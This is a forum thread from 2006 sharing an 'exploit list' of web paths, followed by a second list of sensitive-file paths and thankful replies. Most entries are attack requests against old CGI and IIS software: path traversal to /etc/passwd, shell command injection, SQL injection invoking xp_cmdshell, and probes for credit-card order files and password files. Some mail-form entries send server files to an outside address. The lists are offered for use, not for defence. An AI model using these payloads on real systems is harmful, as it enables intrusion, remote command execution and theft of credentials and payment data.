/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net 
/cgi-bin/mailform.cgi 
/cgi-bin/mailform.exe 
/cgi-bin/mailform.pl 
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html= 
/cgi-bin/maillist.pl
/cgi-bin/maillist.pl 
/cgi-bin/mailmachine.cgi
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls| 
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls| 
/cgi-bin/mailme.exe 
/cgi-bin/mailmepro.exe 
/cgi-bin/mailnews.cgi 
/cgi-bin/MailPost.exe 
/cgi-bin/mailsend.exe 
/cgi-bin/mailto.cgi 
/cgi-bin/mailto.exe
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto 
/cgi-bin/mailview.cgi
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html= 
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi 
/cgi-bin/mall2000.cgi
/cgi-bin/man.sh
/cgi-bin/man.sh 
/cgi-bin/mastergate/
/cgi-bin/mastergate/.pass.new 
/cgi-bin/mastergate/.passcelebs.bak 
/cgi-bin/mastergate/.passxrc.bak 
/cgi-bin/mastergate/accountcreate.cgi
/cgi-bin/mastergate/add.cgi
/cgibin/mastergate/add.cgi 
/cgi-bin/mastergate/add.cgi 
/cgi-bin/mastergate/count.cgi
/cgi-bin/mastergate/modify.cgi
/cgi-bin/mastergate/passwords
/cgi-bin/mastergate/passwords 
/cgi-bin/mastergate/passwords.3-1 
/cgi-bin/mastergate/passwords.org 
/cgi-bin/mastergate/search.cgi
/cgi-bin/mastergate/search.cgi?search=0&search_on=all
/cgi-bin/mastergate/search.cgi?search=o&search_on=all
/cgi-bin/mc.txt
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF= 
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts 
/cgi-bin/msn.cgi 
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html 
/cgi-bin/nbmember.cgi
/cgi-bin/nbmember.cgi?cmd=list_all_users
/cgi-bin/ncbook/book.cgi?action=defaultt=|ls|&form_tid=996604045&prev=main.html&list_message_index=10 
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report? 
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report? 
/cgi-bin/netauth.cgi?cmd=show&page=../../ 
/cgi-bin/news/news.cgi?addAuthor 
/cgi-bin/newsdesk.cgi?t=../pass.txt 
/cgi-bin/nph-maillist.pl 
/cgi-bin/nph-publish
/cgi-bin/nph-publish 
/cgi-bin/nph-test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-test-cgi 
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0 
/cgi-bin/OrderForm.cgi 
/cgi-bin/orderlog.txt
/cgi-bin/orders.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders/mc.txt
/cgibin/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-bin/p.cgi
/cgibin/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/pagelog.cgi?display=../../../../tmp/a 
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah 
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi 
/cgi-bin/paramtool 
/cgi-bin/passcfg 
/cgibin/passwdMgmt.log 
/cgi-bin/password.txt
/cgi-bin/PDG_cart/card.txt
/cgi-bin/PDG_Cart/mc.txt
/cgi-bin/pdg_cart/order.log
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/pennywize.cgi
/cgi-bin/perl 
/cgi-bin/perl.exe
/cgi-bin/perl.exe 
/cgi-bin/perlshop.cgi
/cgi-bin/perlshop.cgi 
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay 
/cgi-bin/pfdisplay.cgi
/cgi-bin/pfdisplay.cgi 
/cgi-bin/PGPMail.pl 
/cgi-bin/phf
/cgi-bin/phf 
/cgi-bin/phf.cgi
/cgi-bin/phf.cgi 
/cgi-bin/phf.pp
/cgi-bin/phf.pp 
/cgi-bin/php
/cgi-bin/php 
/cgi-bin/php.cgi
/cgi-bin/php.cgi 
/cgi-bin/phpinfo.php 
/cgi-bin/phpinfo.php3 
/cgi-bin/pi?page=document/show_file&id= 
/cgi-bin/pin.txt
/cgi-bin/pincodes.txt
/cgi-bin/ping.cgi 
/cgi-bin/plusmail 
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00 
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00 
/cgi-bin/post16.exe 
/cgi-bin/post32.exe 
/cgi-bin/postcard.pl 
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts 
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls| 
/cgi-bin/postie.cgi 
/cgi-bin/postie.exe 
/cgi-bin/postings.cgi 
/cgi-bin/post-query? 
/cgi-bin/powerup/r.cgi?FILE=main.html 
/cgi-bin/powerup/r.pl?FILE=main.html 
/cgi-bin/ppdscgi.exe 
/cgi-bin/printenv 
/cgi-bin/process_bug.cgi 
/cgi-bin/processit.pl 
/cgi-bin/psw/adduser.cgi
/cgi-bin/psw/adtuser.cgi?c=pwd/cgi-bin/card.cgi
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10 
/cgi-bin/pwcba.cgi
/cgi-bin/pwcba.cgi 
/cgi-bin/pwcba.cgi?
/cgi-bin/query%3f 
/cgi-bin/r_manage.cgi
/cgi-bin/red/red.pl
/cgi-bin/responder.cgi 
/cgi-bin/rguest.exe
/cgi-bin/rguest.exe 
/cgi-bin/rmp_query 
/cgi-bin/root.exe
/cgi-bin/rwwwshell.pl 
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 
/cgi-bin/script.bat%3f&dir 
/cgi-bin/scripts/cart.pl 
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items 
/cgi-bin/scripts/cart.pl?env 
/cgi-bin/scripts/cart.pl?vars 
/cgi-bin/sdbsearch.cgi?stichwort=keyword 
/cgi-bin/search.cgi%3fletter= 
/cgi-bin/search.pl 
/cgi-bin/search.pl?form=search.pl%00 
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc 
/cgi-bin/sendform.cgi
/cgi-bin/sendform.cgi 
/cgi-bin/sendmail.cgi 
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message 
/cgi-bin/sendtemp.pl?templ=../../etc/passwd 
/cgi-bin/sensepost.exe
/cgi-bin/sgdynamo.exe?HTNAME=default.htm 
/cgi-bin/shop.cgi
/cgi-bin/shop.cgi/page=../../../../etc/hosts 
/cgibin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/orders/orders.txt
/cgi-bin/shopper
/cgi-bin/shopper.cgi
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts 
/cgi-bin/Shopper.exe
/cgi-bin/showfile 
/cgi-bin/simple 
/cgi-bin/simple/config/menu 
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg 
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls| 
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run 
/cgi-bin/SiteAdmin/SiteAdmin.pl
/cgi-bin/sojourn.cgi?cat=ng%00 
/cgi-bin/source.asp 
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts 
/cgi-bin/ssi//../../../../../../../../../etc/hosts 
/cgi-bin/ssi/cgi-bin/ssi 
/cgi-bin/stats.pl 
/cgi-bin/statsconfig.pl 
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00 
/cgi-bin/store/agora.cgi?page=hoschi.html 
/cgi-bin/story.cgi?next= 
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00 
/cgi-bin/survey.cgi
/cgi-bin/survey.cgi 
/cgi-bin/sys_pass
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 
/cgi-bin/technote/.htolo
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00 
/cgi-bin/telnet.cgi
/cgi-bin/test.bat 
/cgi-bin/test.cgi
/cgi-bin/test.cgi 
/cgi-bin/test.cgi?c=pwd
/cgi-bin/test.exe 
/cgi-bin/test.php3 
/cgi-bin/test.pl 
/cgi-bin/test.txt;%20/bin/ls 
/cgi-bin/test-cgi
/cgi-bin/test-cgi 
/cgi-bin/texis.exe/ngohos 
/cgi-bin/texis/hoschiboschi 
/cgi-bin/textcounter.pl
/cgi-bin/textcounter.pl 
/cgi-bin/top/admin.cgi
/cgi-bin/traceroute.cgi 
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts 
/cgi-bin/tst.bat 
/cgi-bin/tst2.bat 
/cgi-bin/ttawebtop.cgi/?action=start&pg= 
/cgi-bin/Ultimate.cgi 
/cgi-bin/UltraBoard/UltraBoard.cgi
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= 
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= 
/cgi-bin/uncgi 
/cgi-bin/unlg1.1
/cgi-bin/unlg1.1 
/cgi-bin/upload.cgi 
/cgi-bin/upload.pl
/cgi-bin/upload.pl 
/cgi-bin/uploadn.asp 
/cgi-bin/user_info.php3? user_username=''+or+admin_level=2+or+username%3d'x
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als 
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls 
/cgi-bin/verotelrum.pl
/cgi-bin/view.sh
/cgi-bin/view.sh 
/cgi-bin/view-source
/cgi-bin/view-source 
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts 
/cgi-bin/w_mem.cgi
/cgi-bin/w3mail/login.cgi 
/cgi-bin/w3-msql/index.html 
/cgi-bin/wais.pl 
/cgi-bin/way-board.cgi?db=way-board.cgi%00 
/cgi-bin/web.pl 
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/Web_Store/web_store.cgi?page=%00 
/cgi-bin/Web2000/oor/content_areas/members/auth.txt.bak 
/cgi-bin/web2mail.cgi 
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst 
/cgi-bin/webcart/webcart.cgi
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD 
/cgi-bin/webdata_test.pl 
/cgi-bin/webdist.cgi
/cgi-bin/webdist.cgi 
/cgi-bin/webdriver 
/cgi-bin/webgais
/cgi-bin/webgais 
/cgi-bin/webplus?script= 
/cgi-bin/websendmail
/cgi-bin/websendmail 
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts 
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi 
/cgi-bin/webwho.pl 
/cgi-bin/wguest.exe
/cgi-bin/wguest.exe 
/cgi-bin/whois.cgi 
/cgi-bin/whois_raw.cgi
/cgi-bin/whois_raw.cgi 
/cgi-bin/windmail.exe?%20|%20dir%20c:\ 
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com 
/cgi-bin/winnt/system32/cmd.exe
/cgi-bin/wrap 
/cgi-bin/wrap.cgi
/cgi-bin/wrap.cgi 
/cgi-bin/ws_mail.cgi?kill=ng 
/cgi-bin/wsbpasswd.cgi?
/cgi-bin/wsendmail.exe 
/cgi-bin/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi 
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwadmin.pl 
/cgi-bin/wwwboard.pl
/cgi-bin/wwwboard.pl 
/cgi-bin/wwwjoin/admin/www800.cgi
/cgi-bin/www-sql
/cgi-bin/www-sql 
/cgi-bin/www-sql;;;
/cgi-bin/wwwthreads/changedisplay.pl 
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00 
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00 
/cgi-bin2/ccbill-local.cgi
/cgi-bin2/ccbill-local.cgi?cmd=MENU
/cgi-bin2/info/.htpasswd
/cgi-bin2/pm/password_manager/
/cgi-bin-sdb/ 
/cgi-bintergate/add.cgi 
/cgi-dos/args.bat
/cgi-dos/args.bat 
/cgi-dos/args.cmd
/cgi-dos/args.cmd 
/cgi-dos/foo.cmd?xxx&dir 
/cgi-home/ 
/cgi-local
/cgi-local/ 
/cgi-local/cart.pl
/cgi-local/cart32.exe
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/orders/orders.txt
/cgi-local/FormMail.cgi
/cgi-local/FormMail.cgi 
/cgi-local/formmail.pl
/cgi-local/medstore/loadpage.cgi
/cgi-local/orders/orders.txt
/cgi-local/pagelog.cgi
/cgi-local/PDG_Cart/shopper.conf
/cgi-local/shop.pl/SID=947626980.19094/page=;ls| 
/cgi-local/shop/auth_data/auth_user_file.txt
/cgi-local/shop/orders/orders.txt
/cgis/cart.pl
/cgis/cart32.exe
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/orders/orders.txt
/cgis/orders/orders.txt
/cgis/pagelog.cgi
/cgis/shop/auth_data/auth_user_file.txt
/cgis/shop/orders/orders.txt
/cgi-shl 
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999 
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999 
/cgi-sys/cart.pl
/cgi-sys/cart32.exe
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-sys/PGPMail.pl 
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/orders/orders.txt
/cgiWebupdate.exe 
/cgi-win
/cgi-win/
/cgi-win/ 
/cgi-win/~auth.cgi
/cgi-win/~auth.cgi 
/cgi-win/add_user.cgi
/cgi-win/add_user.cgi 
/cgi-win/admin.cgi
/cgi-win/admin.cgi 
/cgi-win/aglimpse
/cgi-win/aglimpse 
/cgi-win/anyform2
/cgi-win/AnyForm2 
/cgi-win/AT-admin.cgi 
/cgi-win/auth.cgi
/cgi-win/auth.cgi 
/cgi-win/bnbform.cgi 
/cgi-win/campas
/cgi-win/campas 
/cgi-win/cart.pl
/cgi-win/cart32.exe
/cgi-win/ccbill-local.cgi
/cgi-win/ccbill-local.pl
/cgi-win/classifieds.cgi
/cgi-win/classifieds.cgi 
/cgi-win/count.cgi
/cgi-win/count.cgi 
/cgi-win/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/orders/orders.txt
/cgi-win/environ.cgi
/cgi-win/environ.cgi 
/cgi-win/faxsurvey
/cgi-win/faxsurvey 
/cgi-win/filemail.pl
/cgi-win/filemail.pl 
/cgi-win/files.pl
/cgi-win/files.pl 
/cgi-win/finger
/cgi-win/finger 
/cgi-win/handler
/cgi-win/handler 
/cgi-win/htmlscript
/cgi-win/htmlscript 
/cgi-win/info2www
/cgi-win/info2www 
/cgi-win/jj
/cgi-win/jj 
/cgi-win/maillist.pl
/cgi-win/maillist.pl 
/cgi-win/man.sh
/cgi-win/man.sh 
/cgi-win/nph-test.cgi
/cgi-win/nph-test.cgi 
/cgi-win/nph-test-cgi
/cgi-win/nph-test-cgi 
/cgi-win/orders/orders.txt
/cgi-win/perl.exe
/cgi-win/perl.exe 
/cgi-win/pfdisplay.cgi
/cgi-win/pfdisplay.cgi 
/cgi-win/phf
/cgi-win/phf 
/cgi-win/php.cgi
/cgi-win/php.cgi 
/cgi-win/rguest.exe
/cgi-win/rguest.exe 
/cgi-win/shop/auth_data/auth_user_file.txt
/cgi-win/shop/orders/orders.txt
/cgi-win/survey.cgi
/cgi-win/survey.cgi 
/cgi-win/test.cgi
/cgi-win/test.cgi 
/cgi-win/test-cgi
/cgi-win/test-cgi 
/cgi-win/textcounter.pl
/cgi-win/textcounter.pl 
/cgi-win/unlg1.1
/cgi-win/unlg1.1 
/cgi-win/uploader.exe
/cgi-win/uploader.exe 
/cgi-win/view.sh
/cgi-win/view.sh 
/cgi-win/view-source
/cgi-win/view-source 
/cgi-win/webdist.cgi
/cgi-win/webdist.cgi 
/cgi-win/webgais
/cgi-win/webgais 
/cgi-win/websendmail
/cgi-win/websendmail 
/cgi-win/wguest.exe
/cgi-win/wguest.exe 
/cgi-win/wwwboard.pl
/cgi-win/wwwboard.pl 
/cgi-win/www-sql
/cgi-win/www-sql

Last edited by slysnake; 01-03-2006 at 08:11 AM..
  Reply With Quote

Old 01-02-2006, 05:37 PM   #2
speedy501
Guest
 
Posts: n/a
Threads: 5107
Default

thanks for this
  Reply With Quote

Old 01-03-2006, 01:40 AM   #3
overkill
Guest
 
Posts: n/a
Threads: 5107
Default

Quote:
Not allowed. sorry

--------------------------------------------------------------------------------
Last edited by slysnake : Today at 02:12 AM.


I asked if it would be ok, -----v
http://www.xisp.org/forum/showthread.php?t=15532


but I won't post this stuff if you say so?
  Reply With Quote

Old 01-03-2006, 08:10 AM   #4
slysnake
Cheshire Cat
 
slysnake's Avatar
 
slysnake is offline Offline
Join Date: Jan 2005
Posts: 5,507
Threads: 315
slysnake is on a distinguished road
Default

admin says it's OK so I put it back
__________________
"How do you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
  Reply With Quote

Old 01-04-2006, 04:47 AM   #5
JohnSON
Guest
 
Posts: n/a
Threads: 5107
Default

Cool, now let's see if I have any more luck than with the previous hole list..
  Reply With Quote

Old 01-04-2006, 05:23 AM   #6
PLUSMATIC
Guest
 
Posts: n/a
Threads: 5107
Default

im suprised to see this allowed :P Nice contribution none the less
  Reply With Quote

Thank you Thank YOu thank YOU :)
Old 01-04-2006, 05:30 AM   #7
A_Tjuh
Guest
 
Posts: n/a
Threads: 5107
Thumbs up Thank you Thank YOu thank YOU :)

Thanks soooo much for this i was looking 4 this for such a long time i love you man :)
  Reply With Quote

Old 01-04-2006, 08:17 AM   #8
slysnake
Cheshire Cat
 
slysnake's Avatar
 
slysnake is offline Offline
Join Date: Jan 2005
Posts: 5,507
Threads: 315
slysnake is on a distinguished road
Default

.........
Quote:
Cool, now let's see if I have any more luck than with the previous hole list..
.........
Quote:
Warning: "they are about useless other than for curiosity, unless you know what to do whith them!"
__________________
"How do you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
  Reply With Quote

Old 01-04-2006, 09:52 AM   #9
niolpo
Guest
 
Posts: n/a
Threads: 5107
Default

mmmm....thanks a lot,but all of they looks like a real old holes,but thanks anyway
  Reply With Quote

update to exploit list thread
Old 01-04-2006, 10:23 AM   #10
overkill
Guest
 
Posts: n/a
Threads: 5107
Default update to exploit list thread

Shouldn't be barely any repeats from other log...
will uppdate again soon!

Code:
/Ws_ftp.log
/pass.txt
/password.txt
/passwds.txt
/catalog.nsf
/log.nsf
/domlog.nsf
/domcfg.nsf
/u.txt
/user.txt
/users.txt
/pmcd.conf
/admin.htm
/admin.html
/ws_ftp.log
/%23haccess.ctl
/.htpasswd
/%2ehtpasswd
/.htpasswrd
/%2ehtpasswrd
/.htaccess
/%2ehtaccess
/.passwd
/%2epasswd
/.passwrd
/%2epasswrd
/htpasswd
/htpasswrd
/htaccess
/passwd
/passwrd
/~.htpasswd
/%7e%2ehtpasswd
/~.htpasswrd
/%7e%2ehtpasswrd
/~.htaccess
/%7e%2ehtaccess
/~passwrd
/%7epasswrd
/~.passwd
/%7e%2epasswd
/~.passwrd
/%7e%2epasswrd
/~htpasswd
/%7ehtpasswd
/~htpasswrd
/%7ehtpasswrd
/~htaccess
/%7ehtaccess
/~passwd
/%7epasswd
/.htpasswd
/%2ehtpasswd
/.htpasswrd
/%2ehtpasswrd
/.htaccess
/%2ehtaccess
/.passwd
/%2epasswd
/.passwrd
/%2epasswrd
/htpasswd
/htpasswrd
/htaccess
/passwd
/passwrd
/~.htpasswd
/%7e%2ehtpasswd
/~.htpasswrd
/%7e%2ehtpasswrd
/~.htaccess
/%7e%2ehtaccess
/~passwrd
/%7epasswrd
/~.passwd
/%7e%2epasswd
/~.passwrd
/%7e%2passwrd
/~htpasswd
/%7ehtpasswd
/~htpasswrd
/%7ehtpasswrd
/~htaccess
/%7ehtaccess
/~passwd
/%7epasswd
/master.passwd
/access.conf
/srm.conf
/httpd.conf
/ofs.web-charge
/ofs.web
/~ofs.web-charge
/~ofs.web
/search97.vts
/carbo.dll
/.bash_history
/%2ebash_history
/*.idc
/*.ida
/*.idq
/URL_History.dat
/....../autoexec.bat
/shtml.exe
/linkinfo.cnf
/access.cnf
/postinfo.html
/shadow
/group
/....../
/1
/2
/3
/pub
/members
/member
/mem
/protect
/protected
/etc
/etc/security/passwd
/tcb/auth/files
/etc/shadpw
/etc/tcb/aa/user
/tcb/bin
/etc/tcb
/.secure/etc/passwd
/etc/security/passwd.adjunct
/etc/auth
/etc/udb
/usr
/usr/local/bin
/usr/local/etc
/usr/java/bin
/usr/java
/usr/etc
/usr/bin
/root/usr/etc
/~root/usr/etc
/root/etc
/~root/etc
//etc
/~etc
/~etc/shadow
//~etc
/auth
/auth/Secure-WWW
/auth/Secure-WWW/Users
/sites
//members
/_private
//_private
/%5fprivate
/private
/images
/pics
/pictures
/img
/gallery
/gal
/gallery1
/gal1
/ok
/active
/work
/works
/temponary
/set
/settings
/removed
/cookie
/dir
/dirs
/directory
/map
/server
/credit
/access
/base
/bases
/database
/databases
/data
/patrol
/daemon
/daemons
/demon
/demons
/cyber
/web
/www
/local
/htm
/html
/cybers
/main
/menu
/miembros
/secure
//secure
/user
/%7euser
/users
/%7eusers
/pass
/%7epass
/password
/%7epassword
/passwords
/%7epasswords
/ver
/av
/avs
/credit
/credits
/inside
/logs
/log
/~logs
/%7elogs
/~log
/%7elog
/stats
/stat
/~stats
/%7estats
/~stat
/%7estat
/bin
/iweb800
/iadmin
/autumn
/cgi-bin/wwwjoin/
/m
/cgi-bin/wwwjoin/admin/.htaccess
/cgi-bin/wwwjoin/admin/
/expire
/pwd
/admin/www800.cgi
/cgi
/piranha/secure/passwd.php3
/auth/Secure-WWW/Users/.htpasswd
/auth/Secure-WWW/Users/
/auth/
/admin/trackuser/index.php3
/~cgi
/cgi-dos
/cgi-bin
/~cgi-bin
/cgi-win
/~cgi-win
/config
/orders
/database
/databases
/htdata
/scripts
/temp
/tempfiles
/logfiles
/tmp
/adm
/admin
/sys
/system
/systems
/box
/book
/record
/records
/register
/registered
/reg
/doc
/docs
/document
/documents
/login
/logins
/upload
/uploads
/unsorted
/account
/accounts
/billing
/billings
/point
/points
/node
/nodes
/cc
/my
/pages
/htm
/html
/u
/user
/users
/arch
/archive
/archives
/mail
/ccbill
/ccbill/echeck.htm
/ccbill/index.htm
/ccbill/secure/
/ccbill/signup0000.htm
/ccbill/signup0000.mail_subscriber
/ccbill/signup0000.mail_webmaster
/ccbill/signupck0000.htm/ccbill/welcome.htm
/ibill
/webcash
/root
/web800
/web900
/dmr
/dmr1
/lancelot
/widenet
/wnu
/controlpanel
/cgi-local
/Web2000
/ctc
/oordir
/widenet
/~
/%7e
/~bin
/%7ebin
/~database
/%7edatabase
/~htdata
/%7ehtdata
/~temp
/%7etemp
/~tmp
/%7etmp
/~adm
/%7eadm
/~admin
/%7eadmin
/~sys
/%7esys
/~html
/%7ehtml
/~ibill
/%7eibill
/ofs
/~webcash
/%7ewebcash
/~root
/%7eroot
/~web800
/%7eweb800
/~web900
/%7eweb900
/~dmr
/%7edmr
/~dmr1
/%7edmr1
/~lancelot
/%7elancelot
/~widenet
/%7ewidenet
/~wnu
/%7ewnu
/~ofs
/%7eofs
/~ccbill
/%7eccbill
/servlets
/servlet
/_vti_pvt
/_vti_pvt/_vti_cnf
/%5fvti_pvt/_vti_cnf
/_vti_bin
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_cnf
/_vti_log
/_vti_txt
/%5fvti_pvt
/%5fvti_bin
/%5fvti_cnf
/%5fvti_log
/%5fvti_txt
/cgi-bin\_vti_cnf
/msads
/cfdocs
/iissamples
/WebShop
/store
/merchants
/PDG_Cart
/manage
/Cache
/wwwboard
/mypasswds
/_private/_vti_cnf
/pw
/~root
//~root
/~root/etc/passwd
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/tools/getdrvrs.exe
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../etc/passwd
//cgi-bin/
///cgi-bin/
///cgi-bin/man.pl
/ibill/newmember.html
/ibill/mylogs
/ibill/mypins
/ibill/mylogs/monitor.log
/_vti_bin/_vti_aut/dvwssr.dll
/cgi-bin/scripts/cart.pl
:3128/../../../../../autoexec.bat
/bin/ls
/session/adminlogin?RCpage=/sysadmin/index.stm
/ss.cfg
/ssi/envout.bat
/tmp/sims_setup.dat
/_vti_bin/shtml.exe
/_private/_vti_cnf/form_results.txt
/_private/form_results.txt
/_vti_bin/_vti_aut/author.exe
/prxdocs/misc/prxrch.idq
/iissamples/issamples/query.idq
/iissamples/exair/Search/search.idq
/iissamples/exair/Search/query.idq
/iissamples/issamples/fastq.idq
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/issadmin/bdir.htr
/scripts/mail.cgi
/scripts/mailform.exe
/scripts/mailme.exe
/scripts/mailmepro.exe
/scripts/mailsend.exe
/scripts/no-such-file.pl
/scripts/perl.exe
/scripts/perl?
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postie.cgi
/scripts/postie.exe
/scripts/postinfo.asp
/scripts/process_bug.cgi
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/repost.asp
/scripts/rguest.exe
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/webhits.exe
/scripts/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/scripts/slxweb.dll
/scripts/slxweb.dll/admin
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/test.bat
/scripts/test.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(""cmd.exe+/c%20dir"");--"
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/toos/mkilog.exe
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/wsendmail.exe
/scripts/wsisa.dll
/scripts/wsisa.dll/WService=anything?WSMadmin/search
/search%3f
/search.dll?search?query=%00&logic=AND
/search/iaquery.exe%3f
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/s97_cgi.exe
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/search97.vts
/search97/s97_cgi.exe
/search97/search97.vts
/secret/index.htm
/secret/index.html
/secure/.htaccess
/secure/.wwwacl
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/server-status
/servlet//..//../o.jsp
/servlet/FormMailServlet?juhu.txt
/servlet/ServletManager?username=servlet&password=manager
/servlet/SessionServlet
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/WebPopServlet?config=uii.txt
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
